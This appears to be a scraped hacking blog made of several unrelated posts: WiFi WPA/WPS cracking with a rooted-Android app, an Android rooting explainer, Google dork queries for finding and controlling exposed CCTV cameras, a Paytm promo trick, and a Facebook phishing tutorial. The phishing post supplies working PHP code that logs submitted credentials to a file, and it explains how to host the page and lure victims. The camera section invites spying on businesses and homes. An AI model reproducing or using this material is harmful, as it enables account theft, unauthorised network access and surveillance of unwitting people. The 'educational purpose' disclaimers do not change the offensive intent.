how to hack wifi

Hello friends…! Today I am back with the most amazing hacking in android mobiles and tablets, that is WiFi hacking through android mobile or tablets. It will really amaze you with its features and its capacity to hack WiFi network effectively. This app will help you to crack any wpa/wps enabled WiFi networks.

Requirements:-

1. Rooted android
( For how to root your android see HERE the best 1-Click methods to root Android)
2. App for android - WIFI WPA WPS TESTER (ROOT)


How to hack a WiFi network with Android within few seconds :-

1. In order to hack WiFi network you need to download ‘WIFI WPA WPS TESTER (ROOT) (ROOT)’ app.

Google Play Store Link                       Uploaded APK

(  In Google Play Store you can get the latest version whereas the uploaded APK version is - v2.6.4)

2. Then switch on your WiFi network and scan for available wpa/wps WiFi network.

3. As soon as you notice available WiFi network then open “WIFI WPA WPS TESTER (ROOT)” app.

4. Now you need to click on green color refresh button and it will show you all available networks there.

5. Now just click on [green color locked key locker] symbol and click on try to connect network option.
Now it will show you something like this:

ssid="d-link"
psk="password"
key_mgmt=wpa-psk
priority=1
}
--
ssid=”d-link”
key_mgmt=none
priority=6
}

Now you can see password of that WiFi in the above given code, which is coated just in front of the text psk.

For Example : In the above case the password of the WiFi network is "password".

Yippee! You are done! You have hacked the WiFi network successfully....Enjoy....!!

Proof - 

Note : This WiFi hacking tool will only work on wpa/wps WiFi networks so don’t try with just wpa or  wpa2 networks. Even though you try hack wpa/wps networks sometimes it would fail to hack and it is since you are too far away from router or router is not venerable to hack.

Enjoy....!!


Note - This post is just for educational purpose and to retrieve your own password of your own WiFi network. And we don’t take any responsibility for any misuse of this tool or this article. Please don’t try this with public WiFi networks as it was illegal to do that.



Don't forget to subscribe to my blog for further updates..! Just click the Message Button on the below left corner of your screen and enter your e-mail and click SIGN UP :-)


If you face any problems then you can leave a comment below....we will get back to you as soon as possible. :-) :-)

how to root android

If you are using an Android mobile phone, you might be aware of the term "Rooting". Many times when we search for apps, mobile firmware, etc on Internet, we come across this "Rooting" term. Many people regularly ask me various questions regarding rooting Android mobile phones. Root access is sometimes compared to Jailbreaking devices running the Apple iOS operating system. However, these are different concepts. Jailbreaking describes the bypass of several types of Apple prohibitions for the end user: modifying the operating system (enforced by a "locked bootloader"), installing non-officially approved apps via sideloading, and granting the user elevated administration-level privileges. Only a minority of Android devices locks their bootloaders, and many vendors such as HTC, Sony, Asus and Google explicitly provide the ability to unlock devices, and even replace the operating system entirely. Similarly, the ability to sideload apps is typically permissible on Android devices without root permissions. Thus, it is primarily the third aspect of iOS jailbreaking relating to giving users superuser administrative privileges that most directly correlates to Android rooting.

The most frequently asked questions include what is rooting, how to root Android mobile phones, what are the benefits of rooting, will it damage my phone, etc.. So today in this post, I'm going to answer all these frequently asked questions regarding rooting Android devices.
I'll try to make this topic an ultimate guide for rooting Android mobiles.
For readers convenience I have divided this guide in following categories:
·              What is Android mobile phone rooting….??
·              What are the benefits/advantages of rooting….??
·              What are the disadvantages of rooting….??
·              How to root Android mobile phones and tablets….??
·              What to do after rooting Android mobiles or tablets….??
·              How to Unroot Android devices….?
So without wasting time lets start the ultimate guide for rooting Google Android mobile phones and tablets:

1. What does Rooting an Android Mobile Phone Mean….??

Rooting an Android device means gaining root (Superuser) permissions on your Android device. It can be considered similar to Using built-in Administrator account in Windows or root user (superuser) in Linux operating systems.Rooting is the process of allowing users of smartphones, tablets and other devices running the Android mobile operating system to attain privileged control (known as root access) over various Android's subsystems. As Android uses the Linux kernel, rooting an Android device gives similar access to administrative permissions as on Linux or any other Unix-like operating system such as FreeBSD or OS X.
In Linux/Unix, "Root" is the user who has superuser permissions i.e. elevated user privileges in the operating system. Since Android is based on Linux kernel, rooting an Android device means the same thing. Once you root an Android mobile phone or tablet, you get root or superuser access on the files and programs in Android OS software.
In other words, after rooting an Android device you get full control on your device. All software limitations are removed and you get full access on Android OS.
Many people compare Android devices rooting with jailbreaking Apple iPhones as you are unlocking your Android device OS to obtain root access.

2. What are the Benefits/Advantages of Rooting….??

There are many advantages of rooting Android devices and some of them are as following :-
•  You can access and modify system files and apps in the OS.
  You can install many special apps from Google Play Store which require rooting.
  You can flash custom ROM (i.e. install 3rd party firmware to enjoy latest Android version).
  You can remove preinstalled crapware i.e. useless OEM apps.
  You can install carrier-blocked as well as incompatible apps.
  You can unlock many hidden Android features which were blocked by mobile company.
  You can increase device performance, improve battery life, etc using special apps.
  Full theming capabilities, meaning that everything can be changed and themed from the color of the battery indicator, to the look of the dialer or contact list, to the video that plays while the device boots up.
  Full application control, including the ability to backup, restore, or batch edit applications, or to remove bloatware that comes pre-loaded on many phones.
In other words, you become the boss of your Android device.

3. What are the Disadvantages of Rooting….??

Everything has its advantages and disadvantages. If you are planning to root your Android mobile phone or tablet, you should remember following things :-
  Rooting your Android device will void warranty.
 You might not be able to receive OTA (over-the-air) updates from your carrier after rooting.
  Rooting can brick your Android device.
 Normally rooting doesn't brick your Android device but installing incompatible custom ROMs can definitely damage your phone.

4. How to Root an Android Mobile Phone or Tablet….??

Now the most important question comes! How to root Android devices? There are many ways to root Android mobile phones and tablets. Some of the easiest and 1-click methods can be found in following exclusive tutorial :-


5. Things to Do After Rooting Android Devices

Once you root your Android device, you must check out following useful apps for rooted mobile phones on Google Play Store :-
  Titanium Backup 
  Greenify 
  Set CPU 
  ROM Manager
  RAM Booster
  ROM Toolbox
  NoBloat

You can search on Play Store for many other useful apps specifically developed for rooted devices. You can also try custom ROMs to change your Android mobile phone's look-n-feel.

6. How to Unroot Android Device….??

Almost all PC software and mobile apps which allow you to root your Android device, also allow you to unroot the same device. You can also try "OTA RootKeeper" or "SuperSU" apps to unroot your Android device. If you don't find the option to unroot your device, you can flash an official stock firmware/software on your Android device to make it unrooted.


Hope you like this post....so don't forget to share it :-)


Don't forget to subscribe to my blog for further updates..! Just click the Message Button on the below left corner of your screen and enter your e-mail and click SIGN UP :-)


hack cctv cameras

Ever wanted to spy on a business, workplace or a town....? Or you are just totally bored and got nothing else to do and want to fuck some CCTV Cameras....?? Well this tut is for you....! With this you can hack into the cameras and control them too....!! What I am about to tell you is Google Hacking.

No its not the type of hacking you may know or hear of, but it is a vulnerability. So be warned. Use this tut at your own risk.

Follow the process to Hack CCTV Cameras and access their Footage :-

1. Go to Google http://www.google.com .

2. Enter one of the following lines in Google Dorks / Google search box : ( Note: Do not enter the whole lot, that won’t work )

inurl:"CgiStart?page="
inurl:"/view.shtml
intitle:”Live View / – AXIS
inurl:view/view.shtml
inurl:"ViewerFrame?Mode="
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
inurl:view/indexFrame.shtml
inurl:"view/index.shtml"
inurl:"view/view.shtml"
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera” (disconnected)
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / – AXIS”
intitle:”Live View / – AXIS 206M”
intitle:”Live View / – AXIS 206W”
intitle:”Live View / – AXIS 210?
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=Motion” (disconnected)
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1?
intitle:”sony network camera snc-m1?
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image” (disconnected)
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1? intext:”Open Menu”
intext:”MOBOTIX M10? intext:”Open Menu”
intext:”MOBOTIX D10? intext:”Open Menu”
intitle:”i-Catcher Console – Web Monitor”

3. Find a website like this: http://67.53.48.2/etc , means a page with IP Address like URL.



4. Open a link from that and enjoy the hack....!! You can control the movements of the CCTV Cam, also change its resolution, take a capture and much more...




A house backyard CCTV Footage :-P


For further hack we need certain tools and deep knowledge in Hacking. Hope you like it..!!


Enjoy....!!


Note: The above article is for educational purpose only.


If you face any problems then you can leave a comment below....we will get back to you as soon as possible. :-) :-)


Paytm is one of the best online transaction site which has made Payment of Mobile Online recharge, DTH and Datacard recharge easy. And here I am back with anew trick to get a Paytm Rs. 20 Promo Code.

Note - Now not Working

Follow the following steps to get the Promo Code :-

Note - Carry out the whole process in Google Chrome Browser Only....!!

1. Go to HERE or open this link http://www.mysmartprice.com/promotions/plugin?utm_source=social_media&sender_id=14359965482776  and click on 'ADD TO CHROME'. A notification comes on the Google Chrome window. Click on ADD.




2. As soon as you click on the ADD button, the extension gets installed in your Chrome Browser and a new Pop-Up opens asking for your EmailID and your Phone Number. Enter your EmailID and Phone Number and click on 'GET PAYTM VOUCHER'



3. Now check your EmailID inbox for new mail from MySmartPrice. Open It and click on 'AVAIL YOUR COUPON'. Wait for 72 hours for the coupon to Activate and get displayed.



4. After 72 hours open your mail and again click on 'AVAIL YOUR COUPON', you will get your coupon code. Copy it and use it to add the balance to your Paytm Wallet.

Note - Carry out the whole process in Google Chrome Browser....!!



Enjoy….!!




If you face any problems then you can leave a comment below....we will get back to you as soon as possible. :-) :-)
how to hack facebook
Hello friends....!! From many days I am getting many messages in my inbox on how to hack a Facebook Account. Most of the people are curious to know how hackers take control of their accounts. Here in this post I am going to tell you how to hack a Facebook account and explain one of the popular and easiest attacks called "PHISHING".
Phishing is one of the popular hacking techniques used by hackers to lure victims into giving their login credentials. Phishing Webpage: Phishing webpage is a fake webpage of the target website that helps hackers to lure the victim into believe that they are visiting the legitimate website and letting them to login in the fake webpage and leaking their login credentials ( userID and password ). Let me now explain how to create a Facebook phishing page.

Steps to make a Fake/Phishing Facebook Login Page :-
For your simplicity I have uploaded the required files. You can download them from the given below link and then follow Step 5 onward. You can also make these files yourself by following the steps below.


1. Go to www.facebook.com ( Login Page ) and right click on website => Select "View source" and copy the whole code to notepad ( Press Ctrl+A then Ctrl+C. Then open notepad and press Ctrl+V ).



2. Now search ( Press Ctrl+F ) for keyword "action" in that code. You fill find the code like this: action="https://www.facebook.com/login.php?login_attempt=1".


Here, let me explain what "action" means to. If you have some basic knowledge of web applications, then you already know about that "action" is a HTML attribute that specifies where to send the form-data when a form is submitted. In the above code, the action attribute has the value that points to Facebook login.php file ( https://www.facebook.com/login.php ). So when a user clicks the login button, it will send the data to the login.php page. This .php file will check whether the entered password is valid or not. To capture the form-data, we have to change the action value to our php file. So let us change the value from action="https://www.facebook.com/login.php?login_attempt=1" to action="login.php". Save the file as index.html.


3. Now, let us create our own login.php file that will capture the entered data and redirects to original Facebook page. Open the notepad and copy the following code:

<?php
echo "<html><body bgcolor='#141823'>There Was some problem please try again</body>";
header("Location: http://www.facebook.com");
$handle = fopen("password.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
echo "<script>document.location='https://www.facebook.com/login.php?login_attempt=1';</script></html>";
exit;
?>

Save this file as "login.php"



4. Open the notepad and just save the file as "password.txt" (without any contents).

5. To host your phishing page, you may need a Web-hosting. You can create a free account in any free web hosting providers. Following are best available free Web-hosting sites :-


Once you have created account in free hosting site. Now upload those three file ( index.html, login.php, password.txt ) in the free Web-hosting site.

Upload files to Web-hosting site :-

1. Login to your Web-hosting site and search for cPanel or Settings.
2. Search for File Manager open it and upload the files there.


Your files can be viewed by visiting URL provided when you create account. For example : "yourusername.webhostingdomain.com". Make sure your fake page is working or not, by visiting your URL.


Hack someone’s Facebook Account :-

1. Now, you have to lure your victim to Login into your phishing page by sending them your Phishing page URL i.e. "yourusername.webhostingdomain.com". ( You can lure your victim by telling them to like the page )

2. Once they login into the phishing page ( i.e. they enter their login credentials ), their account is hacked.

3. Now to see the victims userID, Password; login to your Web-hosting account and open "password.html" file to see the victims user id and the password.


Enjoy....!!


Note: The above article is for educational purpose only.



If you face any problems then you can leave a comment below....we will get back to you as soon as possible. :-) :-)